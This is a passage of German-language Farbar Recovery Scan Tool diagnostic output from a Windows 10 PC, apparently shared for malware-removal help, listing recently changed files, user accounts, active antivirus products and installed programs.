S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46688 2019-12-07] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [350136 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [54200 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-13 20:42 - 2021-01-13 20:43 - 000024791 ____C C:\Users\Peter\Desktop\FRST.txt
2021-01-13 20:41 - 2021-01-13 20:43 - 000000000 ___DC C:\FRST
2021-01-13 20:33 - 2021-01-13 19:25 - 002281472 ____C (Farbar) C:\Users\Peter\Desktop\FRST64.exe
2021-01-07 11:18 - 2021-01-07 11:19 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000455408 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000351128 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001507224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001161112 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000816368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000673520 _____ C:\WINDOWS\system32\nvofapi64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000670616 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000555248 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000543128 _____ C:\WINDOWS\SysWOW64\nvofapi.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000047424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 007707544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 006860184 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 004174064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002508528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002098072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001731824 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001585560 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001482992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:00 - 005972824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2021-01-06 17:39 - 2021-01-06 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-06 16:48 - 2021-01-08 08:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-04 15:59 - 2021-01-04 15:59 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2021-01-04 15:57 - 2021-01-04 15:57 - 000016810 _____ C:\WINDOWS\system32\.crusader
2021-01-04 15:44 - 2021-01-12 15:22 - 000000000 ____D C:\WINDOWS\CryptoGuard
2021-01-04 15:44 - 2021-01-12 15:20 - 000000000 ____D C:\ProgramData\HitmanPro.Alert
2021-01-04 15:41 - 2021-01-12 15:23 - 000000000 ____D C:\ProgramData\Sophos
2021-01-04 15:40 - 2021-01-04 15:40 - 307274360 _____ (Sophos Limited) C:\Users\Peter\Downloads\SophosInstall.exe
2020-12-17 10:06 - 2020-12-17 10:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-13 20:34 - 2017-04-02 14:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2021-01-13 20:33 - 2020-08-02 10:34 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-13 20:33 - 2019-12-07 15:51 - 000743650 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-13 20:33 - 2019-12-07 15:51 - 000150072 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-13 20:33 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-13 20:32 - 2017-04-02 14:31 - 000000000 __RSD C:\Users\Peter\Documents\McAfee-Tresore
2021-01-12 15:27 - 2018-11-24 12:22 - 000000000 ____D C:\ProgramData\NVIDIA
2021-01-12 15:23 - 2020-08-02 10:34 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-12 15:23 - 2020-08-02 10:26 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-12 15:23 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-12 15:22 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-12 15:21 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-12 15:03 - 2017-04-02 11:56 - 000000000 ___DC C:\Users\Peter\AppData\LocalLow\Mozilla
2021-01-12 14:54 - 2020-08-02 10:28 - 000000000 ____D C:\Users\Peter
2021-01-09 16:49 - 2020-08-02 10:28 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-09 09:16 - 2020-08-04 15:39 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2021-01-09 09:16 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-09 09:16 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-08 08:57 - 2019-12-07 10:03 - 000008192 _____ C:\WINDOWS\system32\config\ELAM
2021-01-08 08:56 - 2020-12-11 10:37 - 000094208 _____ C:\Users\Peter\AppData\Roaming\cookies.sqlite
2021-01-08 08:54 - 2020-08-02 10:34 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee
2021-01-08 08:54 - 2017-03-31 21:22 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-07 11:20 - 2018-11-24 12:21 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2021-01-07 11:19 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Help
2021-01-07 11:19 - 2018-11-24 12:21 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2021-01-06 17:39 - 2017-04-02 11:42 - 000001012 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-04 10:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-04 10:41 - 2017-12-01 10:37 - 000000000 ____D C:\ProgramData\tmp
2020-12-31 16:20 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-12-30 10:35 - 2018-05-17 11:33 - 000000000 ___DC C:\Users\Peter\AppData\Local\PlaceholderTileLogoFolder
2020-12-29 18:07 - 2018-03-19 14:48 - 000000000 ___DC C:\Users\Peter\AppData\Local\Packages
2020-12-26 15:54 - 2017-09-03 11:42 - 000011483 ____C C:\Users\Peter\Documents\Etiketten 2.odt
2020-12-22 10:53 - 2020-03-04 19:02 - 000000650 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-22 10:53 - 2020-03-04 19:02 - 000000554 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-20 17:40 - 2020-08-02 10:34 - 000003802 _____ C:\WINDOWS\system32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-08-02 10:34 - 000003706 _____ C:\WINDOWS\system32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-03-04 19:02 - 000000000 ____D C:\Users\Peter\AppData\Local\GoToMeeting
2020-12-17 10:43 - 2017-03-31 21:22 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-12-14 14:34 - 2020-11-03 10:52 - 000000000 ____D C:\Users\Peter\AppData\Local\cache
2020-12-14 14:33 - 2020-11-03 10:52 - 000000000 ____D C:\Users\Peter\AppData\Local\Travel Maps

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-12-11 10:37 - 2021-01-08 08:56 - 000094208 _____ () C:\Users\Peter\AppData\Roaming\cookies.sqlite
2018-07-18 11:17 - 2018-07-18 11:17 - 000006144 ____C () C:\Users\Peter\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-05-15 18:39 - 2017-05-15 18:39 - 000007619 ____C () C:\Users\Peter\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         
Addition.txt
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von Peter (13-01-2021 20:43:44)
Gestartet von C:\Users\Peter\Desktop
Windows 10 Pro Version 2004 19041.685 (X64) (2020-08-02 09:35:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-716491260-3257532223-3478221735-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-716491260-3257532223-3478221735-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-716491260-3257532223-3478221735-1000 - Limited - Disabled) => C:\Users\defaultuser0
Gast (S-1-5-21-716491260-3257532223-3478221735-501 - Limited - Disabled)
Peter (S-1-5-21-716491260-3257532223-3478221735-1001 - Administrator - Enabled) => C:\Users\Peter
WDAGUtilityAccount (S-1-5-21-716491260-3257532223-3478221735-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee VirusScan (Enabled - Up to date) {9D4501E6-72F6-2877-C789-89AF6F535B2C}
AS: McAfee VirusScan (Enabled - Up to date) {4DE344F8-6897-65B4-CED0-82B3AF2591B4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Enabled) {A57E80C3-3899-292F-ECD6-209A91801C57}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.465 - Adobe)
AeroFly Professional Deluxe (inkl. Add-On 1) (HKLM-x32\...\{8B3E5A90-1F6E-4FAF-B84F-C306C8A80809}) (Version: 1.9.0103 - IPACS)
AeroFly Professional Deluxe AddOn 3 (True Scale AddOn) (HKLM-x32\...\{4F5EBA69-57B4-484D-B60D-DD95981031A0}) (Version: 1.11.0705 - IPACS)
AeroFly Professional Deluxe AddOn 4 (Team Edition 1) (HKLM-x32\...\{780FAA54-2FA0-4CF4-A9C8-AE50C8B469C9}) (Version: 1.11.0707 - IPACS)
AMD Catalyst Install Manager (HKLM\...\{66AFB595-BC05-2913-7696-6D58F9B733E1}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Apple Application Support (32-Bit) (HKLM-x32\...\{5C028510-A6A1-409A-A2BF-4DCB43B21EF9}) (Version: 7.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{5C7D4FCF-80C5-4520-9934-D50532AAC59C}) (Version: 7.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B5A46811-3612-4DA5-8A5A-E6DED5D7C523}) (Version: 12.2.1.12 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Canon iP4500 series (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP4500_series) (Version:  - )
Canon iP4500 series Benutzerregistrierung (HKLM-x32\...\Canon iP4500 series Benutzerregistrierung) (Version:  - )
Canon My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
Catalyst Control Center Next Localization BR (HKLM\...\{3E245378-BF77-6946-C6F6-096DBE5EAB82}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{45907537-804A-514F-5280-5F4F12A6DCBC}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{962364E4-08BB-347D-32E7-2B789F37BF8A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{A0407E39-2AA4-60B3-885F-3C5347B6909E}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0989D0EA-AFF3-5F9A-3D25-20EE133E409B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{A8689A0F-5928-7300-B82B-C5E85131B7BA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{76AAF56B-93D8-161D-809A-EC05F3B913DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{063CED74-F5F0-870E-DC9C-2D78FDEDA3EE}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{13BB60AA-88F7-4B1F-2DEC-D81EEDE8B3AA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{37AA6227-FF2C-95AC-87C0-45DCC0BB87DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{EB328356-1DF0-1CCE-3607-6361DD329219}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{87E6EC29-AEC5-28CB-F773-93EB6C1B8A2B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{CA55697D-BD74-3ED8-6B21-D7EDAD3B7D02}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{CFC860C8-4F51-E08C-A74C-2E444ED06160}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{9338D693-38B7-1ED4-9B42-BFA1D5600CCB}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{C971C145-258D-6650-7088-13DDB161327A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{EBA09DAF-14B4-7BE7-676E-6E2FB21EDBDD}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{9AA4DD93-94BF-22EA-C9D2-7084F304A31B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{379D900B-A785-6DB0-012E-434356A365B3}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{366C4FB5-CF6E-258B-418D-E6D29549A278}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B10089DE-934F-6E0F-683A-B788F89348DF}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
CD-LabelPrint (HKLM-x32\...\MediaNavigation.CDLabelPrint) (Version:  - )
CEWE Fotowelt (HKLM-x32\...\CEWE Fotowelt) (Version: 7.1.2 - CEWE Stiftung u Co. KGaA)
cewe-fotoservice.de (HKLM-x32\...\cewe-fotoservice.de) (Version: 7.0.3 - CEWE Stiftung u Co. KGaA)
Content Manager (HKLM-x32\...\Content Manager) (Version: 3.18.5.761538 - NNG Llc.)
Disketch Disc-Beschriftungssoftware (HKLM-x32\...\Disketch) (Version: 3.34 - NCH Software)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.94 - NVIDIA Corporation) Hidden
Druckerdeinstallation für EPSON XP-900 Series (HKLM\...\EPSON XP-900 Series) (Version:  - Seiko Epson Corporation)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 19.2 - Thüringer Landesfinanzdirektion)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson Printer Connection Checker (HKLM-x32\...\{189DE071-E0BC-4BA5-8E34-83D5ED12600B}) (Version: 3.2.0.0 - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{28C66F35-69BF-4376-BC80-4D5F4808FF3C}) (Version: 4.6.1 - Seiko Epson Corporation)
EPSON-Handbücher (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.57.0.0 - Seiko Epson Corporation)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{39AB2E37-1A55-4292-A5D3-971E9F70D0F8}) (Version: 2.1.32.0 - MAGIX AG)
GoTo Opener (HKLM-x32\...\{C0F33C38-345C-4C02-B161-11389350C2A5}) (Version: 1.0.533 - LogMeIn, Inc.)
GoToMeeting 10.15.0.19228 (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\GoToMeeting) (Version: 10.15.0.19228 - LogMeIn, Inc.)
iTunes (HKLM\...\{053441A1-A8BD-486F-B06D-F2B478D5925E}) (Version: 12.9.6.3 - Apple Inc.)
LibreOffice 5.2 Help Pack (German) (HKLM\...\{48653D22-E3C0-418F-8DBB-E6AF63F1ED02}) (Version: 5.2.6.2 - The Document Foundation)
LibreOffice 5.2.6.2 (HKLM\...\{2B69F1E6-C4D6-44A2-AFAD-4BD0571D254E}) (Version: 5.2.6.2 - The Document Foundation)
MAGIX Cloud Import (HKLM\...\{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH) Hidden
MAGIX Cloud Import (HKLM\...\MX.{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH)
MAGIX Connect (HKLM\...\{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH) Hidden
MAGIX Connect (HKLM\...\MX.{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH)
MAGIX Foto & Grafik Designer (HKLM\...\{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH) Hidden
MAGIX Foto & Grafik Designer (HKLM-x32\...\MX.{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH)
MAGIX Foto Manager 16 Deluxe (HKLM\...\{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH) Hidden
MAGIX Foto Manager 16 Deluxe (HKLM-x32\...\MX.{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH)
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG) Hidden
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\MAGIX_{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG)
MAGIX PC Check & Tuning 2019 (HKLM-x32\...\PC Check Tuning 2019_is1) (Version: 2.7.0.56 - MAGIX Software GmbH)
MAGIX Screenshare (HKLM-x32\...\{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG) Hidden
MAGIX Screenshare (HKLM-x32\...\MAGIX_{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM\...\{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH) Hidden
MAGIX Speed burnR (HKLM-x32\...\MX.{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH)
MAGIX Travel Maps (HKLM\...\{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH) Hidden
MAGIX Travel Maps (HKLM\...\MX.{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH)
MAGIX Travel Maps Update (HKLM\...\{47A2B863-62A1-4A7D-8AC1-A293C8994747}) (Version: 1.0.1.385 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\{02C2B318-E2DF-4EC4-AD1B-9FF3DD774A04}) (Version: 11.0.0.42 - MAGIX AG) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\MAGIX_MSI_Videodeluxe18_plus) (Version: 11.0.0.42 - MAGIX AG)
MAGIX Video deluxe Plus (Demo) (HKLM\...\{57B24FA4-9B76-490A-8B80-B27F118E751A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 1) (HKLM\...\{4481CFAA-0E76-4076-9FB2-CECEF3D22FE3}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 2) (HKLM\...\{27DFC18E-C49E-4F51-93DD-5E75CE301B9A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 1) (HKLM\...\{395FA56C-DF0F-4836-A3BB-D705B38ABCA1}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 2) (HKLM\...\{B7E1A490-6793-4B18-A803-19AA04197762}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Fotoshow Maker-Stile) (HKLM\...\{388F55AA-7054-43FC-845C-E0A8F549B9AE}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\MX.{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH)
MAGIX Video deluxe Plus (Menüvorlagen) (HKLM\...\{9EAAA0FF-A318-4593-9616-D977655A8B68}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Migrate Content) (HKLM\...\{A0D08159-E17E-4002-8A91-4B29F0145CB8}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Soundtrack Maker-Stile) (HKLM\...\{D5FF70FA-55AD-4B31-87B7-3BB8CB7EED04}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Titeleffekte) (HKLM\...\{81AD8375-39AB-4EEB-9B08-2A9D50F64F91}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Überblendeffekte) (HKLM\...\{39FC2C3B-14F9-48EE-94CC-615459E1C171}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Update Service 5.7.33.77) (HKLM\...\{89C598BE-D4ED-3125-A8AF-406533E46B19}) (Version: 5.7.33.77 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Vorlagen und Effekte) (HKLM-x32\...\MAGIX_GlobalContent.Video_deluxe_Plus) (Version: 1.0.0.0 - MAGIX Software GmbH)
MAGIX Video deluxe Plus Update (HKLM\...\{D5BDA5D0-2661-430E-94A3-8472BF892554}) (Version: 16.0.4.102 - MAGIX Software GmbH) Hidden
McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 16.0 R29 - McAfee, LLC)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
